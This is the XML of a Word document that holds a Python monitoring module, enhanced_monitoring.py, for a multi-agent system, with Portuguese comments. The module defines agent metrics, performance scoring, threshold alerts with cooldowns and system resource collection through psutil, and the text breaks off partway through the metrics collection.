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890B" w14:textId="13C4556A" w:rsidR="006D02FF" w:rsidRDefault="006D02FF">
      <w:r w:rsidRPr="006D02FF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E0D80CC" wp14:editId="4F4B347C">
            <wp:extent cx="2600688" cy="7097115"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="589816910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16910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75AA" w14:textId="300F4806" w:rsidR="006D02FF" w:rsidRDefault="006D02FF">
      <w:r w:rsidRPr="006D02FF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="554AEC70" wp14:editId="365D71DC">
            <wp:extent cx="2295845" cy="276264"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14322809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0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27A9" w14:textId="31CC11B7" w:rsidR="006D02FF" w:rsidRDefault="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enhanced_monitoring.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED7F54" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043AA1BF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SUNA-ALSHAM Enhanced Monitoring System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585BD9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Sistema de monitoramento avançado com métricas em tempo real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C351A0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1F57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FUNCIONALIDADES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375EE17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Métricas detalhadas de cada agente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3BA892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Alertas automáticos para falhas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEB610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Relatórios de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B7986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Visualização em tempo real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C51F13C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Logs estruturados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA03F79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Dashboard de status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AFD3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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083FBE17" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106C26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asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002C5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json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256932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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBFF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logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47B1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statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B815B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datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9514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typing import Dict, Any, List, Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E41B7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dataclasses import dataclass, asdict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A24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collections import defaultdict, deque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC49C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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA38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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3758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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59414D11" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393659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logger = logging.getLogger(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751057D2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F061538" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7768B7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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075924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AgentMetrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C815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"""Métricas detalhadas de um agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3A4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agent_id: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EF0E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agent_type: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9D0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status: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B9D9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uptime_seconds: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD2D8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messages_processed: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B982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messages_per_second: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C81B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response_time_avg_ms: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DCE6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error_count: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8FD2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error_rate: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51995A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cpu_usage_percent: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0333AD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memory_usage_mb: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085F0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last_activity: datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D62A8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capabilities_count: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE084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active_tasks: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C384C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D48960C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B12D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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C281A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SystemAlert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B40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"""Alerta do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B25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alert_id: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68493B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alert_type: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A94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severity: str  # low, medium, high, critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B657A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agent_id: Optional[str]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1727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message: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646D9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details: Dict[str, Any]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670AD3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triggered_at: datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257243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resolved_at: Optional[datetime] = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8CF7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is_resolved: bool = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA26BD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CAD01D7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442C85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PerformanceAnalyzer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A44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"""Analisador de performance do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F8D3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BE8C3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7BA13A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self.performance_history: deque = deque(maxlen=1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733DE1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self.baseline_metrics: Dict[str, float] = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28070C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self.performance_thresholds = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184D5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"response_time_ms": 1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500ABB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"error_rate": 0.05,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1D6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"cpu_usage": 80.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548AA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"memory_usage_mb": 512,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC74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"messages_per_second": 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5B2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028BA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59917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analyze_agent_performance(self, metrics: AgentMetrics) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E3D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"""Analisa performance de um agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FC7E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analysis = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DCF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"agent_id": metrics.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6159EF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"overall_score": 0.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524494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"performance_issues": [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C079E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"recommendations": [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A8B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"trend": "stable"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E588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1A860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39A68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issues = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A682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score_factors = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE1EB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9233F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Analisar tempo de resposta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584707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metrics.response_time_avg_ms &gt; self.performance_thresholds["response_time_ms"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE44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issues.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB453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"type": "high_response_time",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03028C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"severity": "medium",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6E2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"value": metrics.response_time_avg_ms,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9400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"threshold": self.performance_thresholds["response_time_ms"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC37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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1963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score_factors.append(0.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FA66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254AA3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score_factors.append(0.9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E22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56187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Analisar taxa de erro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2995E7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metrics.error_rate &gt; self.performance_thresholds["error_rate"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E581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issues.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA072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"type": "high_error_rate",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4334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"severity": "high",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004801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"value": metrics.error_rate,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FF8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"threshold": self.performance_thresholds["error_rate"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC472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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646924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score_factors.append(0.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC8B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667133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score_factors.append(0.95)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD83C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5A267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Analisar uso de CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02716A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metrics.cpu_usage_percent &gt; self.performance_thresholds["cpu_usage"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5415C2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issues.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D041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"type": "high_cpu_usage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D686A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"severity": "medium",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B733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"value": metrics.cpu_usage_percent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0451DD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"threshold": self.performance_thresholds["cpu_usage"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AE56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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622612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score_factors.append(0.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A70D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48C575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score_factors.append(0.9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F0C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A0B39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Analisar throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3E2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metrics.messages_per_second &lt; self.performance_thresholds["messages_per_second"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0541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issues.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1DF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"type": "low_throughput",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD23A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"severity": "low",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E83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"value": metrics.messages_per_second,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB529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"threshold": self.performance_thresholds["messages_per_second"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57099F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A13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score_factors.append(0.8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD84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0DD016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score_factors.append(0.95)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0308D3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4A2F1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Calcular score geral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0784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analysis["overall_score"] = statistics.mean(score_factors) * 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D688E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analysis["performance_issues"] = issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F0B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AD83E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Gerar recomendações</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC60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recommendations = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B43FD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issue in issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A657D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issue["type"] == "high_response_time":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283CF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recommendations.append("Optimize message processing logic")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B5AE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elif issue["type"] == "high_error_rate":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD98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recommendations.append("Implement better error handling")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFF4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elif issue["type"] == "high_cpu_usage":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1B9B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recommendations.append("Optimize CPU-intensive operations")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2925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elif issue["type"] == "low_throughput":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E90EC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recommendations.append("Increase message processing capacity")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C549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3B091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analysis["recommendations"] = recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C929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B43E7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analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F1907" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0FFEAE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63AA2A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AlertManager:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12307A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"""Gerenciador de alertas do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C57D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B69FB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2BF326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self.active_alerts: Dict[str, SystemAlert] = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D3B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self.alert_history: deque = deque(maxlen=1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A82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self.alert_rules = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C8DF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"agent_down": {"severity": "critical", "cooldown": 300},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4408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"high_error_rate": {"severity": "high", "cooldown": 180},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001467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"performance_degradation": {"severity": "medium", "cooldown": 120},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C1CE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"resource_exhaustion": {"severity": "high", "cooldown": 240}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B13B6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E5462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647CC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check_agent_alerts(self, metrics: AgentMetrics) -&gt; List[SystemAlert]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8FE1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"""Verifica alertas para um agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DAF6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alerts = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6035F9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1AFB0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Verificar se agente está down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E5F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metrics.status != "running":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8181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alert = self._create_alert(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795E46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"agent_down",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D20D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metrics.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05630A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f"Agent {metrics.agent_id} is not running (status: {metrics.status})",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438B1F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{"status": metrics.status, "last_activity": metrics.last_activity.isoformat()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4029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7784FC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alerts.append(alert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C83A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3849D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Verificar alta taxa de erro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A36E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metrics.error_rate &gt; 0.1:  # 10%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C439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alert = self._create_alert(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD1F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"high_error_rate",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD6F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metrics.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A473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f"High error rate detected: {metrics.error_rate:.2%}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F7B5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{"error_rate": metrics.error_rate, "error_count": metrics.error_count}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF6C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65241C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alerts.append(alert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35731F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C98B2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Verificar degradação de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290791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metrics.response_time_avg_ms &gt; 2000:  # 2 segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22728F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alert = self._create_alert(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20040C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"performance_degradation",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5670F5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metrics.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468CF6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f"Performance degradation: {metrics.response_time_avg_ms:.0f}ms avg response time",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E465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{"response_time_ms": metrics.response_time_avg_ms}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0A0E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65EA2C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alerts.append(alert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2A4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D326B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Verificar uso excessivo de recursos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525DD9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metrics.memory_usage_mb &gt; 1024:  # 1GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579A1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alert = self._create_alert(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B35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"resource_exhaustion",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BA78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metrics.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3CC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f"High memory usage: {metrics.memory_usage_mb:.0f}MB",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F391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{"memory_usage_mb": metrics.memory_usage_mb}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F13B0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61782D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alerts.append(alert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A82BF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4F9BF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alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C33C9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9B492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_create_alert(self, alert_type: str, agent_id: str, message: str, details: Dict[str, Any]) -&gt; SystemAlert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6120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"""Cria um novo alerta"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15B5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alert_id = f"{alert_type}_{agent_id}_{int(time.time())}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D1B8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39F21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alert = SystemAlert(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC965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alert_id=alert_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BBD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alert_type=alert_type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD260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severity=self.alert_rules[alert_type]["severity"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC118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agent_id=agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8A7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message=message,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB77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details=details,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD5F5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triggered_at=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D35E2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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374676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5444E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Verificar cooldown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C00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cooldown = self.alert_rules[alert_type]["cooldown"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF54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recent_alerts = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BCF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 for a in self.alert_history </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716572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a.alert_type == alert_type and a.agent_id == agent_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEBAE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and (datetime.now() - a.triggered_at).seconds &lt; cooldown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B983B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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A418A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F6104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not recent_alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3A1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self.active_alerts[alert_id] = alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E75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self.alert_history.append(alert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F90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logger.warning(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚨</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ALERTA {alert.severity.upper()}: {alert.message}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49D6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AC667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alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187AEF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F3F39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resolve_alert(self, alert_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77958E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"""Resolve um alerta"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9505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alert_id in self.active_alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530978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alert = self.active_alerts[alert_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D694E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alert.resolved_at = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF20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alert.is_resolved = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB007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del self.active_alerts[alert_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2802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Alerta {alert_id} resolvido")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE86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25A2B8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get_active_alerts(self) -&gt; List[SystemAlert]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8144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alertas ativos"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D63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list(self.active_alerts.values())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3062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21353C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get_alert_summary(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250E8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resumo dos alertas"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ECA6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active_by_severity = defaultdict(int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C784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alert in self.active_alerts.values():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12424C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active_by_severity[alert.severity] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147E19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494E5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1F4041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"total_active": len(self.active_alerts),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2A85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"by_severity": dict(active_by_severity),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4533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"total_history": len(self.alert_history),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA2D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"last_24h": len([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E15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 for a in self.alert_history </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282251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(datetime.now() - a.triggered_at).days &lt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A277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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC99B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760C536" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367A9EC8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192A23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SystemHealthMonitor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0098B6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"""Monitor de saúde do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A9C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2F73E4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0C197D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self.system_metrics = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F31C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"cpu_percent": 0.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31866D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"memory_percent": 0.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3667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"disk_percent": 0.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1AD1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"network_io": {"bytes_sent": 0, "bytes_recv": 0},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEBCA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"process_count": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9F7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"uptime_seconds": 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2048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A9374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self.start_time = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F18C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EAA42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collect_system_metrics(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C099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"""Coleta métricas do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC58B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449391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CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C390B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self.system_metrics["cpu_percent"] = psutil.cpu_percent(interval=1)</w:t>
      </w:r>
    </w:p>
